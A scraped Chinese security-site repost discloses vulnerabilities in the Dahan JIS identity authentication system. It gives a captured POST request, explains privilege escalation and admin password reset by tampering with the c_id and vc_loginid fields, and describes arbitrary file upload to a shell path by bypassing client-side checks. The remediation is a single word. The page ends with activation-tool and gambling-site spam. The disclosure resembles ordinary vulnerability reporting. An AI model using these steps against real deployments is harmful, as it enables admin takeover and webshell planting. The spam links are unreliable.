大汉通版jis统一身份认证系统漏洞打包

时间:2018/1/21来源:sabfilmyhai.com
大汉通版jis统一身份认证系统漏洞打包 - 网站安全 - 红黑联盟 资讯 安全 论坛 下载 读书 系统 网络 qq 考试 频道栏目 | | | | | | 登录注册 首页 > 安全 >       作者:xcoder 收藏   我要投稿 大汉通版jis统一身份认证系统: 在用户修改信息时进行抓包发现 post: http://10.11.5.201:9080/jis/front/upduser_do. content: c_id=00000&vc_loginid=admin&vc_password=123456&vc_pwd=123456&vc_username=系统管理员&vc_headship=&vc_comptel=&vc_compfax=&vc_mobile=&vc_email=&vc_qq=&vc_msn=&vc_hometel=&vc_usergroupid=&vc_usergroupname=  经过验证c_id为权限控制字段,00000为管理员,vc_loginid为登陆名称,vc_password以及 vc_pwd为密码, (1)用户权限提升: 在修改个人信息时进行抓包,将c_id修改成0000,即可提升为系统管理员, (2)重置管理员密码 将c_id改为00000以及将登陆名称vc_loginid改成admin 密码修改为自己的即可 (3)任意文件上传漏洞  上传地址:http://url//jis/update/update.jsp  去掉本地js验证 shell地址:http://10.11.5.201:9080/jis/update/data/上传的文件名 修复方案:控制 点击复制链接 与好友分享! --> 相关tag标签 上一篇:java反射执行系统命令 下一篇:netcms存在存储形xss 相关文章 大汉jis身份认证系统sql注入 技术分享:通过kerberos unconstrain 美国标准实验室(nist):向短信身份认 后https时代:网站身份认证比加密更重 大汉版通jcms内容管理系统sql注射 大汉版通jcms数据库配置文件读取 大汉版通jcms数据库配置文件读取漏洞 大汉版通jvideo系统sql注射 大汉版通系统敏感信息泄露+sql注入漏洞 大汉网络文件读取漏洞+读取管理员密码 热门专题推荐 个人电脑安全 u盘启动工具 小马激活工具 office激活 win7激活工具 图文推荐 3年前披露的14款word 你还敢随意蹭网吗?黑 看网页也能泄露手机号 黑客是怎样隐藏自己? 文章推荐 · 苹果全面禁止热更新,《王者荣耀》、《 · 华人慈善榜:马化腾马云李嘉诚小扎夫人 · 北斗地基增强系统一期建设完成,具备厘 · 把命运交给共享单车?醒醒吧,传统自行 · 顺丰新业务:可找快递小哥买彩票 · 盲人接受手机应用培训:可接听电话使用 · 谷歌迟到 百度抢跑 中国ai市场谁领风 · 刷屏!百度ppt事件遭王思聪批:一页三 · win7激活工具 · win10激活工具 · win7激活工具旗舰版 · office2010激活密钥 · windows7激活密钥 · office2010激活工具 ·  · win10激活工具 热门新闻 · nsa泄露黑客工具之 fuzzbunch & da · 3个小妙招有效防止服务器遭受ddos攻击 · 这13招教你成为优秀的白帽黑客 · theshadowbrokers心怀不轨再放nsa黑客 · nsa泄露工具中的dander spiritz工具使 · 如何获取电信(光)猫路由器超级帐号密 · 方程式又一波大规模 0day 攻击泄漏, · phpcms v9.6.0 任意文件上传漏洞分析 | | | | | | |vip技术培训 |版权所有: --致力于做实用的it技术学习网站

文章地址:http://sabfilmyhai.com/sow/w1/2cto/c1/Article/201401/274650.html
相关阅读:
    暂无相关文章
真钱扑克 铁算盘高手论坛 BBIN担保 娱乐赌博网站 金沙城 足球单场预测 澳门天上人间娱乐 澳门赌场开户 澳门金沙赌城